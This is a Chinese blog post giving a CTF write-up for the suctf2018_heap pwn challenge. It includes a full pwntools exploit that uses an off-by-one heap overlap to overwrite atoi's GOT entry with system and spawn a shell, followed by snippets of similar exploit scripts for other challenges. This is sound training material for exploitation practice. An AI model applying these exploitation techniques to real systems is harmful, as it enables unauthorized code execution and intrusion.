suctf2018_heap

最新推荐文章于 2024-10-29 19:03:43 发布
最新推荐文章于 2024-10-29 19:03:43 发布
阅读量414 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 题目 BUUCTF 文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/104546659
本文详细解析了suctf2018_heap题目中的offbyone漏洞利用过程,通过堆重叠技巧修改指针段,将atoi函数替换为system,最终实现获取shell的目的。文章提供了完整的Python exploit代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

suctf2018_heap

这道题会一次性申请2个相同大小的chunk做的时候有点逻辑混乱深深的怀疑本来是ubuntu16的环境…
思路 :
off by one打成堆重叠写到指针段写atoi为system拿shell
exp:

from pwn import *
#p=process('./offbyone')
p=remote('node3.buuoj.cn',26238)
elf=ELF('./offbyone')
libc=elf.libc
def add(size,content):
    p.sendlineafter('edit','1')
    p.sendlineafter('len',str(size))
    p.sendafter('data',content)

def delete(idx):
    p.sendlineafter('edit','2')
    p.sendlineafter('id',str(idx))

def show(idx):
    p.sendlineafter('edit','3')
    p.sendlineafter('id',str(idx))

def edit(idx,content):
    p.sendlineafter('edit','4')
    p.sendlineafter('id',str(idx))
    p.sendafter('data',content)

add(0x88,'a'*0x88)
add(0x88,'\x11'*0x88)
add(0x88,'\x12'*0x88)
edit(0,'b'*0x88+'\xc1')
edit(2,'\x11'*0x20+p64(0)+p64(0x61))
delete(2)
delete(1)
add(0xb0,'\x52'*0x88+p64(0x91)+p64(0x6020C0-0x10))
add(0x88,'d'*0x20)
add(0x88,'\x11'*0x88)
edit(2,p64(0)*2+p64(elf.got['atoi']))
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['atoi']
system=libcbase+libc.sym['system']
edit(0,p64(system))
sleep(1)
p.sendline('sh')
#add(0x88,'/bin/sh\x00')
#show(2)
p.interactive()
2018SUCTF部分wp
Risker
05-28 3067
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
堆(heap)系列_0x04:堆的内部结构(_HEAP=_HEAP_SEGMENT+_HEAP_ENTRY)
可乐松子的博客
06-14 1510
_HEAP=_HEAP_SEGMENT+_HEAP_ENTRY,这3种数据结构使用WinDbg进行分析
suctf_2018_basic pwn
qq_62887641的博客
09-20 161
给出后门,ret2text。
[BUUCTF]PWN——suctf_2018_basic pwn
mcmuyanga的博客
02-02 690
suctf_2018_basic pwn 附件 步骤 例行检查,64位程序,开启了RELRO和NX 试运行一下程序,看看大概的情况 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157 main() s存在溢出,简单的覆盖返回地址到后门函数类型的题目 完整exp from pwn import * r=remote('node3.buuoj.cn',25779) flag_addr=0x401157 payload='a'*(0x110+8)+p6
[SUCTF 2018 招新赛]basic pwn
最新发布
fanshaoze的博客
10-29 466
查看发现这是64位函数。
suctf_2018_basic
z1r0的博客
01-11 338
suctf_2018_basic 查看保护 ret2text即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28575) else: r = process(file_name) elf = ELF(file_name) def dbg()
native_heapdump_viewer.py
07-16
使用方法如下: ...python native_heapdump_viewer.py --symbols symbols 00.txt >00.log python native_heapdump_viewer.py --symbols symbols 01.txt >01.log 对比00.log和01.log,查看内存增长的点
mysql tmp_table_size和max_heap_table_size大小配置
01-19
(实际起限制作用的是tmp_table_size和max_heap_table_size的最小值。)如果内存临时表超出了限制,MySQL就会自动地把它转化为基于磁盘的MyISAM表,存储在指定的tmpdir目录下,默认: mysql> show variables like ...
suctf2018-noend writeup
qq_39153421的博客
03-24 330
题目 保护全开,主函数很简单,发现malloc没有检查分配失败的情况,若分配失败会返回0,接可以伪造size-1实现任意地址末位写0,为利用提供了条件。 可以看到题目size>0x7f不会被free,小于0x7f就会被free掉。 while ( 1 ) { do { memset(s, 0, 0x20uLL); read(0, s, 0x1FuLL); size = strtoll(s, 0LL, 10); buf = mall
buuoj Pwn writeup 266-270
yongbaoii的博客
09-01 251
266 pwnable_silverbullet create 创造个什么武器,然后武器描述,然后长度是它的什么power。 power_up 那么显然我刚刚如果通过’\x00’的截断,power整成0,那么我这里可以直接溢出。 beat exp from pwn import * context.log_level = "DEBUG" debug = 0 if debug: p = process("./silver_bullet") libc = ELF('/lib/i386-li
2018 SUCTF招新赛
qq_42192672的博客
11-15 1929
PWN 1.stack checksec一波 什么保护都没开,可还行,IDA找一波漏洞 read函数百分之百溢出 我们看到了我们喜爱的 改一下rip美滋滋 exp #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal = ['gnome-terminal','-x','b...
BUUCTF-pwn(11)
njh18790816639的博客
01-09 2809
mrctf2020_easy_equation 简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞! axb_2019_fmt64 经典循环格式化字符串64位漏洞! 唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击! from elftools.construct.macros import Padding from pwn import * from LibcSearcher import * context(log_level='debu
xctf ics-05 wp
doudoudedi
06-18 2784
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2771
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
ciscn_2019_n_4
doudoudedi
02-03 2043
堆块上有悬挂的指针直接对它进行写入即可 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25967) elf=ELF('./ciscn_2019_n_4') libc=elf.libc def add(size,content): p.sen...
bugku pwn2
doudoudedi
06-04 1735
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
BUUCTF get_started_3dsctf_2016
doudoudedi
10-04 1341
这道题和昨天差不多栈溢出覆盖返回地址然后把bss段mprotect可读可写可执行然后写入shellcode跳入bss段即可 exp: from pwn import * def debug(): gdb.attach(p) #p=process('./getstarted') p=remote('node2.buuoj.cn.wetolink.com',28646) elf=ELF('./ge...
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1293
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
BUUCTF reverse_3
doudoudedi
06-28 1261
今天考计算机组成原理被老师一顿讲,诶还是自己太菜了 我感觉都要挂科了~~~~~ 中午做了一个逆向分享一下 main函数: __int64 main_0() { int v0; // eax const char *v1; // eax size_t v2; // eax int v3; // edx __int64 v4; // ST08_8 signed int j; /...
C++语法——make_heap、push_heap、pop_heap、sort_heap使用介绍
06-13
make_heap、push_heap、pop_heap和sort_heap都是C++ STL库中的算法,用于操作堆(heap)数据结构。 1. make_heap:将一个无序的区间转换为堆。函数原型如下: ``` template void make_heap (RandomAccessIterator...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值